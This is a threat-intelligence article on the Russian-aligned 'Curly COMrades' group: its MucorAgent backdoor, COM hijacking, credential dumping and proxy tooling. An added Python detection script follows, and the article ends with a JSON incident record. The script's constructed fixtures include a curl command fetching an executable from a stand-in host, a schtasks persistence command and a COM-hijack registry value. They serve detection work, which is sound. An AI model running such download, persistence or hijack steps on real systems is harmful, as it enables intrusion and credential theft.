New Russian-Linked Cyber-Espionage Group "Curly COMrades" Targets Government and Energy Sectors
A newly identified cyber-espionage threat group, tracked as Curly COMrades, has been conducting operations aligned with Russian geopolitical interests since mid-2024. The group has targeted government and judicial bodies in Georgia and energy firms in Moldova, deploying a sophisticated custom backdoor malware called MucorAgent.
Attack Chain and Tactics
Curly COMrades employs a three-stage .NET-based malware designed for stealth and persistence. The attack begins with an undetermined initial access vector, followed by the deployment of proxy agents like the Go-based Resocks, which is retrieved via curl.exe and registered as scheduled tasks or Windows services for persistence. Communication with the command-and-control (C2) server occurs over TCP ports 443 or 8443.
For redundancy, the group uses custom SOCKS5 servers, SSH with Stunnel for remote port forwarding, and a tool called CurlCat, which obfuscates traffic by relaying it through compromised legitimate websites using libcurl and a custom Base64 alphabet.
Unconventional Persistence Mechanisms
Bitdefender researchers observed an unusual persistence method: hijacking a Component Object Model (COM) object tied to NGEN (Native Image Generator), a Windows .NET Framework component. The hijacked object is loaded by a disabled scheduled task that the system runs at unpredictable intervals, such as during idle periods or application deployments. The group also deployed legitimate remote monitoring tools, including Remote Utilities (RuRat) and RMM software, to maintain interactive control over compromised systems.
MucorAgent Backdoor Capabilities
The MucorAgent backdoor consists of three components:
- COM hijacking to load a second .NET stage.
- AMSI bypass to evade Windows’ Antimalware Scan Interface.
- Encrypted payload execution, where the malware searches for index.png and icon.png files that are actually encrypted data blobs downloaded from compromised websites.
The threat actor conducted credential theft, including attempts to dump the NTDS database from domain controllers and extract LSASS memory for active credentials. They also used living-off-the-land binaries (LOLBins) such as netstat, tasklist, systeminfo, wmic and ipconfig, together with PowerShell Active Directory enumeration, to move laterally and exfiltrate data.
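The tradecraft described above (curl.exe fetching tooling, scheduled-task and service persistence, the per-user COM hijack, and bursts of reconnaissance LOLBins) leaves traces in ordinary endpoint telemetry. The following Python is an added example written for this page, not code from Bitdefender or from the report: it runs four constructed detection rules over a handful of constructed Sysmon-style process and registry events and returns the findings. Hosts, users, paths, thresholds and the CLSID GUID are all assumptions; the real NGEN CLSID is not on the page and is represented by a placeholder.

```python
"""Added example (not the page's or Bitdefender's code): a small detection pass
over constructed Sysmon-style events covering the defender-visible side of the
tradecraft described above.

Rules:
  curl_to_user_writable           curl.exe writing into a user-writable path
  persistence_from_user_writable  schtasks/sc creating a task or service whose
                                  binary lives in a user-writable path
  com_clsid_override              a per-user (HKU) CLSID InprocServer32 or
                                  LocalServer32 value pointing at a DLL in a
                                  user-writable path (per-user CLSID entries take
                                  precedence over HKLM, which is why COM hijacking works)
  recon_burst                     several distinct recon LOLBins from one user on
                                  one host inside a short window
All events, hosts, users, paths, thresholds and the GUID are constructed."""
from collections import defaultdict
from datetime import datetime, timedelta
import re

# Paths an unprivileged user can normally write to (assumption; tune per estate).
USER_WRITABLE = re.compile(
    r"\\users\\[^\\]+\\(appdata|downloads)\\|\\users\\public\\|\\programdata\\|\\temp\\",
    re.IGNORECASE,
)
RECON_LOLBINS = {"netstat.exe", "tasklist.exe", "systeminfo.exe", "wmic.exe", "ipconfig.exe"}
RECON_WINDOW = timedelta(seconds=120)   # constructed threshold
RECON_MIN_DISTINCT = 4                  # constructed threshold

# Constructed telemetry: (ISO timestamp, host, user, kind, fields)
EVENTS = [
    ("2025-08-01T10:00:00", "ws01", "corp\\jdoe", "process",
     {"image": r"C:\Windows\System32\curl.exe", "parent": r"C:\Windows\System32\cmd.exe",
      "cmdline": r"curl.exe -o C:\Users\Public\svc.exe http://192.0.2.10/x"}),
    ("2025-08-01T10:00:05", "ws01", "corp\\jdoe", "process",
     {"image": r"C:\Windows\System32\schtasks.exe", "parent": r"C:\Windows\System32\cmd.exe",
      "cmdline": r"schtasks /create /tn Updater /tr C:\Users\Public\svc.exe /sc onlogon"}),
    # Sysmon EventID 13-style registry value set; the GUID is a placeholder, not the real NGEN CLSID.
    ("2025-08-01T10:01:00", "ws01", "corp\\jdoe", "registry",
     {"target": r"HKU\S-1-5-21-1-2-3-1001\Software\Classes\CLSID"
                r"\{00000000-0000-0000-0000-000000000000}\InprocServer32\(Default)",
      "details": r"C:\Users\Public\loader.dll"}),
    ("2025-08-01T10:02:00", "ws01", "corp\\jdoe", "process",
     {"image": r"C:\Windows\System32\netstat.exe", "cmdline": "netstat -ano"}),
    ("2025-08-01T10:02:10", "ws01", "corp\\jdoe", "process",
     {"image": r"C:\Windows\System32\tasklist.exe", "cmdline": "tasklist"}),
    ("2025-08-01T10:02:20", "ws01", "corp\\jdoe", "process",
     {"image": r"C:\Windows\System32\systeminfo.exe", "cmdline": "systeminfo"}),
    ("2025-08-01T10:02:30", "ws01", "corp\\jdoe", "process",
     {"image": r"C:\Windows\System32\wbem\wmic.exe", "cmdline": "wmic os get caption"}),
    ("2025-08-01T10:02:40", "ws01", "corp\\jdoe", "process",
     {"image": r"C:\Windows\System32\ipconfig.exe", "cmdline": "ipconfig /all"}),
    # Benign: a lone ipconfig by an admin on another host must not fire.
    ("2025-08-01T11:00:00", "ws02", "corp\\asmith", "process",
     {"image": r"C:\Windows\System32\ipconfig.exe", "cmdline": "ipconfig"}),
]


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def _finding(rule, host, user, ts, evidence):
    return {"rule": rule, "host": host, "user": user, "ts": ts, "evidence": evidence}


def detect(events):
    """Return a list of findings (dicts with rule/host/user/ts/evidence)."""
    findings = []
    recon = defaultdict(list)  # (host, user) -> [(timestamp, lolbin)]
    for ts_str, host, user, kind, f in sorted(events, key=lambda e: e[0]):
        ts = datetime.fromisoformat(ts_str)
        if kind == "process":
            image = _basename(f["image"])
            cmd = f.get("cmdline", "")
            if image == "curl.exe" and USER_WRITABLE.search(cmd):
                findings.append(_finding("curl_to_user_writable", host, user, ts_str, cmd))
            if (image in ("schtasks.exe", "sc.exe") and re.search(r"\bcreate\b", cmd, re.I)
                    and USER_WRITABLE.search(cmd)):
                findings.append(_finding("persistence_from_user_writable", host, user, ts_str, cmd))
            if image in RECON_LOLBINS:
                recon[(host, user)].append((ts, image))
        elif kind == "registry":
            target = f["target"].lower()
            per_user_clsid = target.startswith("hku\\") and "\\software\\classes\\clsid\\" in target
            server_key = "\\inprocserver32" in target or "\\localserver32" in target
            if per_user_clsid and server_key and USER_WRITABLE.search(f.get("details", "")):
                findings.append(_finding("com_clsid_override", host, user, ts_str,
                                         f["target"] + " -> " + f["details"]))
    # Sliding window: enough distinct recon binaries from one user/host in a short span.
    for (host, user), seq in recon.items():
        seq.sort()
        for i, (t0, _) in enumerate(seq):
            window = {img for t, img in seq[i:] if t - t0 <= RECON_WINDOW}
            if len(window) >= RECON_MIN_DISTINCT:
                findings.append(_finding("recon_burst", host, user, t0.isoformat(), sorted(window)))
                break
    return findings


if __name__ == "__main__":
    for hit in detect(EVENTS):
        print(hit["rule"], hit["host"], hit["user"], hit["ts"])
```

In a real deployment these rules would read from the SIEM and be tuned against the estate's baseline, since administrators legitimately run ipconfig, schtasks and even curl. The per-user CLSID rule is the one most specific to this group's persistence: a value written under HKU\<SID>\Software\Classes\CLSID shadows the machine-wide registration for that user's processes, so any such write that points at a DLL outside Program Files or System32 deserves a look.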
Detection and Attribution
Despite efforts to blend malicious activity with legitimate traffic, Curly COMrades’ operations generated enough detectable noise to be flagged by modern EDR/XDR solutions. While no direct links to known Russian APT groups have been confirmed, the targeting of Georgian and Moldovan entities aligns with Russian strategic interests. The group’s heavy reliance on curl.exe for exfiltration and COM hijacking led researchers to name them Curly COMrades.
Government of Georgia cybersecurity rating report: https://www.rankiteo.com/company/government-of-georgia
{
  "id": "GOV1775759952",
  "linkid": "government-of-georgia",
  "type": "Cyber Attack",
  "date": "8/2025",
  "severity": "100",
  "impact": "6",
  "explanation": "Attack threatening the economy of geographical region"
}
{
  "affected_entities": [
    {"industry": "Government", "location": "Georgia", "type": "Government/Judicial Bodies"},
    {"industry": "Energy", "location": "Moldova", "type": "Energy Firms"}
  ],
  "attack_vector": "Undetermined initial access vector, COM hijacking, scheduled tasks, Windows services",
  "data_breach": {
    "data_encryption": "Yes (payloads encrypted as PNG files)",
    "data_exfiltration": "Yes (via curl.exe, CurlCat, and encrypted payloads)",
    "file_types_exposed": ["PNG (encrypted data blobs)", "Active Directory data"],
    "personally_identifiable_information": "Likely (credentials, NTDS database)",
    "sensitivity_of_data": "High (NTDS database, LSASS memory, Active Directory enumeration)",
    "type_of_data_compromised": ["Credentials", "Sensitive government/energy sector data"]
  },
  "date_detected": "2024",
  "description": "A newly identified cyber-espionage threat group, tracked as Curly COMrades, has been conducting operations aligned with Russian geopolitical interests since mid-2024. The group has targeted government and judicial bodies in Georgia and energy firms in Moldova, deploying a sophisticated custom backdoor malware called MucorAgent.",
  "impact": {
    "data_compromised": "Credentials (NTDS database, LSASS memory), sensitive government and energy sector data",
    "identity_theft_risk": "High (personally identifiable information and credentials compromised)",
    "operational_impact": "Lateral movement, data exfiltration, potential disruption of critical services",
    "systems_affected": "Government/judicial bodies (Georgia), energy firms (Moldova)"
  },
  "initial_access_broker": {
    "backdoors_established": "Yes (Resocks, RuRat, RMM software)",
    "high_value_targets": "Government/judicial bodies (Georgia), energy firms (Moldova)"
  },
  "investigation_status": "Ongoing",
  "motivation": "Geopolitical interests (aligned with Russian strategic objectives)",
  "post_incident_analysis": {
    "root_causes": "COM hijacking, scheduled tasks, use of legitimate remote monitoring tools, undetermined initial access vector"
  },
  "references": [{"source": "Bitdefender"}],
  "response": {
    "enhanced_monitoring": "EDR/XDR solutions",
    "third_party_assistance": "Bitdefender researchers"
  },
  "threat_actor": "Curly COMrades",
  "title": "New Russian-Linked Cyber-Espionage Group 'Curly COMrades' Targets Government and Energy Sectors",
  "type": "Cyber-Espionage"
}